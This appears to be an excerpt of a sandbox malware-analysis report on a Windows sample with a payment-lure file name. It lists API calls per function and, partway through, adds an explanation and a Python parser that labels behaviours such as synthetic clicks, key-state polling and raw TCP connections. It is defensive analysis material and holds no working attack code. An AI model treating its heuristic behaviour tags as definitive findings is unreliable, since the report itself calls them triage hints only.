                                                                  • GetStdHandle.KERNEL32(0000000C), ref: 002C9588
                                                                  • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 002C95B9
                                                                  • GetStdHandle.KERNEL32(0000000C), ref: 002C95CB
                                                                  • CreateFileW.KERNEL32(nul,40000000,00000002,0000000C,00000003,00000080,00000000), ref: 002C9605
                                                                  Strings
                                                                  Similarity
                                                                  • API ID: CreateHandle$FilePipe
                                                                  • String ID: nul
                                                                  • API String ID: 4209266947-2873401336
                                                                  APIs
                                                                  • GetStdHandle.KERNEL32(000000F6), ref: 002C9653
                                                                  • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 002C9683
                                                                  • GetStdHandle.KERNEL32(000000F6), ref: 002C9694
                                                                  • CreateFileW.KERNEL32(nul,80000000,00000001,0000000C,00000003,00000080,00000000), ref: 002C96CE
                                                                  Strings
                                                                  Similarity
                                                                  • API ID: CreateHandle$FilePipe
                                                                  • String ID: nul
                                                                  • API String ID: 4209266947-2873401336
                                                                  APIs
                                                                  • SetErrorMode.KERNEL32(00000001), ref: 002CDB0A
                                                                  • GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 002CDB5E
                                                                  • __swprintf.LIBCMT ref: 002CDB77
                                                                  • SetErrorMode.KERNEL32(00000000,00000001,00000000,0031DC00), ref: 002CDBB5
                                                                  Strings
                                                                  Similarity
                                                                  • API ID: ErrorMode$InformationVolume__swprintf
                                                                  • String ID: %lu
                                                                  • API String ID: 3164766367-685833217
                                                                  APIs
                                                                    • Part of subcall function 002BC82D: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 002BC84A
                                                                    • Part of subcall function 002BC82D: GetWindowThreadProcessId.USER32(?,00000000), ref: 002BC85D
                                                                    • Part of subcall function 002BC82D: GetCurrentThreadId.KERNEL32 ref: 002BC864
                                                                    • Part of subcall function 002BC82D: AttachThreadInput.USER32(00000000), ref: 002BC86B
                                                                  • GetFocus.USER32 ref: 002BCA05
                                                                    • Part of subcall function 002BC876: GetParent.USER32(?), ref: 002BC884
                                                                  • GetClassNameW.USER32(?,?,00000100), ref: 002BCA4E
                                                                  • EnumChildWindows.USER32(?,002BCAC4), ref: 002BCA76
                                                                  • __swprintf.LIBCMT ref: 002BCA90
                                                                  Strings
                                                                  Similarity
                                                                  • API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows__swprintf
                                                                  • String ID: %s%d
                                                                  • API String ID: 3187004680-1110647743
                                                                  APIs
                                                                  • __lock.LIBCMT ref: 002A7AD8
                                                                    • Part of subcall function 002A7CF4: __mtinitlocknum.LIBCMT ref: 002A7D06
                                                                    • Part of subcall function 002A7CF4: EnterCriticalSection.KERNEL32(00000000,?,002A7ADD,0000000D), ref: 002A7D1F
                                                                  • InterlockedIncrement.KERNEL32(?), ref: 002A7AE5
                                                                  • __lock.LIBCMT ref: 002A7AF9
                                                                  • ___addlocaleref.LIBCMT ref: 002A7B17
                                                                  Strings
                                                                  Similarity
                                                                  • API ID: __lock$CriticalEnterIncrementInterlockedSection___addlocaleref__mtinitlocknum
                                                                  • String ID: `0
                                                                  • API String ID: 1687444384-1757186122
                                                                  APIs
                                                                  • _memset.LIBCMT ref: 002EE33D
                                                                  • _memset.LIBCMT ref: 002EE34C
                                                                  • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00343D00,00343D44), ref: 002EE37B
                                                                  • CloseHandle.KERNEL32 ref: 002EE38D
                                                                  Strings
                                                                  Similarity
                                                                  • API ID: _memset$CloseCreateHandleProcess
                                                                  • String ID: D=4
                                                                  • API String ID: 3277943733-3280879621
                                                                  APIs
                                                                  • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 002E19F3
                                                                  • GetProcessIoCounters.KERNEL32(00000000,?), ref: 002E1A26
                                                                  • GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 002E1B49
                                                                  • CloseHandle.KERNEL32(?), ref: 002E1BBF
                                                                  Similarity
                                                                  • API ID: Process$CloseCountersHandleInfoMemoryOpen
                                                                  • String ID:
                                                                  • API String ID: 2364364464-0
                                                                  APIs
                                                                  • SendMessageW.USER32(?,0000041C,00000000,00000000), ref: 002EE1D5
                                                                  • SendMessageW.USER32(?,000000B0,?,?), ref: 002EE20D
                                                                  • IsDlgButtonChecked.USER32(?,00000001), ref: 002EE248
                                                                  • GetWindowLongW.USER32(?,000000EC), ref: 002EE269
                                                                  • SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 002EE281
                                                                  Similarity
                                                                  • API ID: MessageSend$ButtonCheckedLongWindow
                                                                  • String ID:
                                                                  • API String ID: 3188977179-0
                                                                  APIs
                                                                  • VariantInit.OLEAUT32(?), ref: 002C1CB4
                                                                  • VariantClear.OLEAUT32(00000013), ref: 002C1D26
                                                                  • VariantClear.OLEAUT32(00000000), ref: 002C1D81
                                                                  • VariantClear.OLEAUT32(?), ref: 002C1DF8
                                                                  • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 002C1E26
                                                                  Similarity
                                                                  • API ID: Variant$Clear$ChangeInitType
                                                                  • String ID:
                                                                  • API String ID: 4136290138-0
                                                                  APIs
                                                                    • Part of subcall function 0028936C: __swprintf.LIBCMT ref: 002893AB
                                                                    • Part of subcall function 0028936C: __itow.LIBCMT ref: 002893DF
                                                                  • LoadLibraryW.KERNEL32(?,00000004,?,?), ref: 002E06EE
                                                                  • GetProcAddress.KERNEL32(00000000,?), ref: 002E077D
                                                                  • GetProcAddress.KERNEL32(00000000,00000000), ref: 002E079B
                                                                  • GetProcAddress.KERNEL32(00000000,?), ref: 002E07E1
                                                                  • FreeLibrary.KERNEL32(00000000,00000004), ref: 002E07FB
                                                                    • Part of subcall function 0029E65E: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,002CA574,?,?,00000000,00000008), ref: 0029E675
                                                                    • Part of subcall function 0029E65E: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,002CA574,?,?,00000000,00000008), ref: 0029E699
                                                                  Similarity
                                                                  • API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad__itow__swprintf
                                                                  • String ID:
                                                                  • API String ID: 327935632-0
                                                                  • Opcode ID: e6a55dc732515151f8ccb19d4b080e7c0e3d77a4702bd8ea0930d5266b53f23a
                                                                  • Instruction ID: 899ddef11f001161e7c68bd671919f63e92af398c255d2cf630cee1a9a18c4dd
                                                                  • Opcode Fuzzy Hash: e6a55dc732515151f8ccb19d4b080e7c0e3d77a4702bd8ea0930d5266b53f23a
                                                                  • Instruction Fuzzy Hash: 23515979A51245DFCB00EFA8C8909ADF7B5BF08310F548056E916AB392DB70ED56CF50
                                                                  APIs
                                                                    • Part of subcall function 002E3C06: CharUpperBuffW.USER32(?,?,?,?,?,?,?,002E2BB5,?,?), ref: 002E3C1D
                                                                  • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 002E2EEF
                                                                  • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 002E2F2E
                                                                  • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 002E2F75
                                                                  • RegCloseKey.ADVAPI32(?,?), ref: 002E2FA1
                                                                  • RegCloseKey.ADVAPI32(00000000), ref: 002E2FAE
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: Close$BuffCharConnectEnumOpenRegistryUpper
                                                                  • String ID:
                                                                  • API String ID: 3740051246-0
                                                                  • Opcode ID: 33714507320e3a4fa41caf9bcb8503a52a2cb23c2175ebede910135c1cb22afc
                                                                  • Instruction ID: dbbeaa7721a5bb8365ee58726c63b8ca9bfa2f81a081109b5e3e36714105d4d9
                                                                  • Opcode Fuzzy Hash: 33714507320e3a4fa41caf9bcb8503a52a2cb23c2175ebede910135c1cb22afc
                                                                  • Instruction Fuzzy Hash: C7517A71228244AFD704EF64C891E6AB7F8FF88304F54491EF596972A1DB70E928CF52
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 3958d362f97bdac51c5fd8734edb5eda47690f93b8658c12760ffd1faf8f5bba
                                                                  • Instruction ID: 4a45b05c301c9602ebdd6cb5c4f9ad56b61472c0d6f1f7bd363884f27df4e4f7
                                                                  • Opcode Fuzzy Hash: 3958d362f97bdac51c5fd8734edb5eda47690f93b8658c12760ffd1faf8f5bba
                                                                  • Instruction Fuzzy Hash: 70413C39961285AFCB10DFF9CC44FA9BF68FB09310FA50125F819A72D1C771AD62CA50
                                                                  APIs
                                                                  • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 002D12B4
                                                                  • GetPrivateProfileSectionW.KERNEL32(?,00000001,00000003,?), ref: 002D12DD
                                                                  • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 002D131C
                                                                    • Part of subcall function 0028936C: __swprintf.LIBCMT ref: 002893AB
                                                                    • Part of subcall function 0028936C: __itow.LIBCMT ref: 002893DF
                                                                  • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 002D1341
                                                                  • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 002D1349
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
                                                                  • String ID:
                                                                  • API String ID: 1389676194-0
                                                                  • Opcode ID: ec3f9ad89fae247e4c921ecf86d83182b0d3d05b21a39bcd78759aff4ff8d126
                                                                  • Instruction ID: b61889715a9671305d61ad5c12bd0510d2d83dbe7a794b3a4711b0f86e183bed
                                                                  • Opcode Fuzzy Hash: ec3f9ad89fae247e4c921ecf86d83182b0d3d05b21a39bcd78759aff4ff8d126
                                                                  • Instruction Fuzzy Hash: 1F410D39A11105DFCB01EF64C9919ADBBF5FF08314B148095E905AB3A2DB31ED51DF50
                                                                  APIs
                                                                  • GetCursorPos.USER32(000000FF), ref: 0029B64F
                                                                  • ScreenToClient.USER32(00000000,000000FF), ref: 0029B66C
                                                                  • GetAsyncKeyState.USER32(00000001), ref: 0029B691
                                                                  • GetAsyncKeyState.USER32(00000002), ref: 0029B69F
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: AsyncState$ClientCursorScreen
                                                                  • String ID:
                                                                  • API String ID: 4210589936-0
                                                                  • Opcode ID: 4ec6d58d023208bc45425c6e248ea99a62f4ca4ac7b442dfe539c0c3223530a9
                                                                  • Instruction ID: 644fa2524055e88717a1bb8b8f821ce9161471760356713857df41c5cacd4bb9
                                                                  • Opcode Fuzzy Hash: 4ec6d58d023208bc45425c6e248ea99a62f4ca4ac7b442dfe539c0c3223530a9
                                                                  • Instruction Fuzzy Hash: 9441803551411ABBDF169F64C844EE9FBB9BB05360F10432AF86992290CB70A9A0DF91
                                                                  APIs
                                                                  • GetWindowRect.USER32(?,?), ref: 002BB369
                                                                  • PostMessageW.USER32(?,00000201,00000001), ref: 002BB413
                                                                  • Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 002BB41B
                                                                  • PostMessageW.USER32(?,00000202,00000000), ref: 002BB429
                                                                  • Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 002BB431
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: MessagePostSleep$RectWindow
                                                                  • String ID:
                                                                  • API String ID: 3382505437-0
                                                                  • Opcode ID: 6bbc71dba07f91bae57e65b0ef82f31814b981ddbe751d22803b02b3b4104390
                                                                  • Instruction ID: 728707dd34962b7481509c8ace8654718f1a78747799e0679d31b5f31e0ececb
                                                                  • Opcode Fuzzy Hash: 6bbc71dba07f91bae57e65b0ef82f31814b981ddbe751d22803b02b3b4104390
                                                                  • Instruction Fuzzy Hash: 4031BA7191021AEBDF05CFA8D94DADE3BB9FB04319F104269F921AB1D1C7B09964CB90
                                                                  APIs
                                                                  • IsWindowVisible.USER32(?), ref: 002BDBD7
                                                                  • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 002BDBF4
                                                                  • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 002BDC2C
                                                                  • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 002BDC52
                                                                  • _wcsstr.LIBCMT ref: 002BDC5C
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: MessageSend$BuffCharUpperVisibleWindow_wcsstr
                                                                  • String ID:
                                                                  • API String ID: 3902887630-0
                                                                  • Opcode ID: bf2b36e47002b7cf6014949bf6796f20f5fa0655e4481358ca0ed55b55dc09bc
                                                                  • Instruction ID: 481e3db5cc0b5885362824fe8f3f2fdeac0dc41509c2cac0e08d82e85a0d5769
                                                                  • Opcode Fuzzy Hash: bf2b36e47002b7cf6014949bf6796f20f5fa0655e4481358ca0ed55b55dc09bc
                                                                  • Instruction Fuzzy Hash: 71213731224204BBEB155F789C49EFB7FACDF457A0F10803AF809CA081FAA1DC11D660
                                                                  APIs
                                                                  • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 002BBC90
                                                                  • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 002BBCC2
                                                                  • __itow.LIBCMT ref: 002BBCDA
                                                                  • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 002BBD00
                                                                  • __itow.LIBCMT ref: 002BBD11
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: MessageSend$__itow
                                                                  • String ID:
                                                                  • API String ID: 3379773720-0
                                                                  • Opcode ID: 50c9206077a8631663a30c3fd723c0d67adc62d3c7a7ad0d8be00a781d37bef1
                                                                  • Instruction ID: 8cd2e4502929ffb0bc8908df25e5b92d3a0e6063ff3be12999004761a23d87a1
                                                                  • Opcode Fuzzy Hash: 50c9206077a8631663a30c3fd723c0d67adc62d3c7a7ad0d8be00a781d37bef1
                                                                  • Instruction Fuzzy Hash: 21210B356102187FDB16AE648C49FDF7FA8AF49350F000425F905EB181DBB4CD2587A1
                                                                  APIs
                                                                    • Part of subcall function 002850E6: _wcsncpy.LIBCMT ref: 002850FA
                                                                  • GetFileAttributesW.KERNEL32(?,?,?,?,002C60C3), ref: 002C6369
                                                                  • GetLastError.KERNEL32(?,?,?,002C60C3), ref: 002C6374
                                                                  • CreateDirectoryW.KERNEL32(?,00000000,?,?,?,002C60C3), ref: 002C6388
                                                                  • _wcsrchr.LIBCMT ref: 002C63AA
                                                                    • Part of subcall function 002C6318: CreateDirectoryW.KERNEL32(?,00000000,?,?,?,002C60C3), ref: 002C63E0
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: CreateDirectory$AttributesErrorFileLast_wcsncpy_wcsrchr
                                                                  • String ID:
                                                                  • API String ID: 3633006590-0
                                                                  • Opcode ID: 6401c8619c43f2c5543d00eaecb9d3eacade3cba3e39e37b6f1c54af18c4d85a
                                                                  • Instruction ID: 0ab3e88d16eee743e072f5b9162a4f3d3f1cd225d0f5db12cc864c25da9ee30d
                                                                  • Opcode Fuzzy Hash: 6401c8619c43f2c5543d00eaecb9d3eacade3cba3e39e37b6f1c54af18c4d85a
                                                                  • Instruction Fuzzy Hash: 69210B315352564BDF15AFB8AC5AFEA239CAF05B60F1005EEF405C30C1EF60D9908E65
                                                                  APIs
                                                                    • Part of subcall function 002DA82C: inet_addr.WSOCK32(00000000,00000000,?,?,?,00000000), ref: 002DA84E
                                                                  • socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 002D8BD3
                                                                  • WSAGetLastError.WSOCK32(00000000), ref: 002D8BE2
                                                                  • connect.WSOCK32(00000000,?,00000010), ref: 002D8BFE
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: ErrorLastconnectinet_addrsocket
                                                                  • String ID:
                                                                  • API String ID: 3701255441-0
                                                                  • Opcode ID: 73cca680060c0f5ecda8f0c6b19742ce8a817ab9dcc9b386522fcd51c317b418
                                                                  • Instruction ID: e7104fc527cfa9e125d6cab1a6235ae23573c1353e16217f2cdf46139277063f
                                                                  • Opcode Fuzzy Hash: 73cca680060c0f5ecda8f0c6b19742ce8a817ab9dcc9b386522fcd51c317b418
                                                                  • Instruction Fuzzy Hash: 92219D312212149FCB15AF68CC95F7E77EDAB48710F04844AF956AB3D2CA70AC118B51
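The function summaries above are easier to triage once the raw `API.MODULE(args), ref: addr` lines are parsed and the message constants decoded: the block at ref 002BB413/002BB429 posts 0x201/0x202 (WM_LBUTTONDOWN/WM_LBUTTONUP) with a Sleep in between, i.e. a synthetic mouse click, and the block at ref 002D8BD3..002D8BFE calls socket(2,1,6)/connect, i.e. a plain AF_INET/SOCK_STREAM/IPPROTO_TCP client. The parser below is an added example written for this page, not Joe Sandbox or AutoIt code; the sample lines are copied from the blocks above, the message and socket constants are the Windows SDK values, and the behaviour tag names are my own labels.

```python
"""Parse Joe Sandbox per-function "APIs" entries and tag the behaviour they imply."""
import re
from dataclasses import dataclass
from typing import List, Optional

# Constructed sample: "APIs" lines copied from function blocks on this page.
SAMPLE = """\
• GetWindowRect.USER32(?,?), ref: 002BB369
• PostMessageW.USER32(?,00000201,00000001), ref: 002BB413
• Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 002BB41B
• PostMessageW.USER32(?,00000202,00000000), ref: 002BB429
  • Part of subcall function 002DA82C: inet_addr.WSOCK32(00000000,00000000,?,?,?,00000000), ref: 002DA84E
• socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 002D8BD3
• connect.WSOCK32(00000000,?,00000010), ref: 002D8BFE
• GetForegroundWindow.USER32 ref: 002D8458
• __itow.LIBCMT ref: 002BBCDA
• SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 002BBCC2
"""

# One entry per line: optional "Part of subcall function X:" prefix, API.MODULE,
# optional "(args)", then "ref: ADDR". LIBCMT entries carry no argument list.
LINE_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-F]{8}):\s*)?"
    r"(?P<api>[A-Za-z_]\w*)\.(?P<mod>[A-Z0-9]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-F]{8})\s*$"
)

# Windows SDK message values (WM_* from winuser.h, LVM_* = 0x1000 + n from commctrl.h).
WINDOW_MESSAGES = {
    0x000D: "WM_GETTEXT", 0x000E: "WM_GETTEXTLENGTH",
    0x0201: "WM_LBUTTONDOWN", 0x0202: "WM_LBUTTONUP",
    0x0204: "WM_RBUTTONDOWN", 0x0205: "WM_RBUTTONUP",
    0x1004: "LVM_GETITEMCOUNT", 0x102C: "LVM_GETITEMSTATE",
}
AF_INET, SOCK_STREAM, IPPROTO_TCP = 2, 1, 6


@dataclass
class Call:
    api: str
    module: str
    args: List[Optional[int]]   # None for an unresolved "?" argument
    ref: int
    subcall_of: Optional[int] = None


def parse_arg(tok: str) -> Optional[int]:
    tok = tok.strip()
    return None if tok == "?" else int(tok, 16)   # "-00000001" parses as -1


def parse_calls(text: str) -> List[Call]:
    calls = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue   # headers, hashes and dump metadata are skipped
        args = [parse_arg(a) for a in m["args"].split(",")] if m["args"] else []
        sub = int(m["sub"], 16) if m["sub"] else None
        calls.append(Call(m["api"], m["mod"], args, int(m["ref"], 16), sub))
    return calls


def message_name(call: Call) -> Optional[str]:
    """Decode uMsg (second parameter) of SendMessageW/PostMessageW; None otherwise."""
    if call.api not in ("SendMessageW", "PostMessageW") or len(call.args) < 2:
        return None
    msg = call.args[1]
    if msg is None:
        return "?"
    return WINDOW_MESSAGES.get(msg, f"0x{msg:04X}")


def tag_behaviours(calls: List[Call]) -> List[str]:
    """Map a function's call set to coarse behaviour labels (labels are this example's own)."""
    apis = {c.api for c in calls}
    msgs = {message_name(c) for c in calls} - {None}
    tags = set()
    if {"WM_LBUTTONDOWN", "WM_LBUTTONUP"} <= msgs:
        tags.add("synthetic_mouse_click")
    if {"WM_GETTEXTLENGTH", "WM_GETTEXT"} <= msgs:
        tags.add("window_text_read")
    if {"socket", "connect"} <= apis and any(
        c.api == "socket" and c.args[:3] == [AF_INET, SOCK_STREAM, IPPROTO_TCP] for c in calls
    ):
        tags.add("raw_tcp_connect")
    if "RegEnumKeyExW" in apis:
        tags.add("registry_enumeration")
    if "GetAsyncKeyState" in apis:
        tags.add("input_state_polling")
    if "GetPixel" in apis:
        tags.add("screen_pixel_read")
    if any(a.startswith("WritePrivateProfile") for a in apis):
        tags.add("ini_write")
    return sorted(tags)


if __name__ == "__main__":
    parsed = parse_calls(SAMPLE)
    for c in parsed:
        print(f"{c.ref:08X} {c.api}.{c.module} msg={message_name(c)} sub={c.subcall_of}")
    print("tags:", tag_behaviours(parsed))
```

The regex deliberately accepts the three line shapes that occur in these summaries (argument list present, absent as in `GetForegroundWindow.USER32 ref:`, and the indented `Part of subcall function` form), and unresolved `?` arguments stay `None` so a tag is only raised on constants the disassembler actually recovered. Run over a whole report, the tags give a per-function behaviour inventory that is easier to diff between samples than the fuzzy hashes alone; they are triage hints, not verdicts, since an AutoIt runtime legitimately carries every one of these routines.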
                                                                  APIs
                                                                  • IsWindow.USER32(00000000), ref: 002D8441
                                                                  • GetForegroundWindow.USER32 ref: 002D8458
                                                                  • GetDC.USER32(00000000), ref: 002D8494
                                                                  • GetPixel.GDI32(00000000,?,00000003), ref: 002D84A0
                                                                  • ReleaseDC.USER32(00000000,00000003), ref: 002D84DB
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: Window$ForegroundPixelRelease
                                                                  • String ID:
                                                                  • API String ID: 4156661090-0
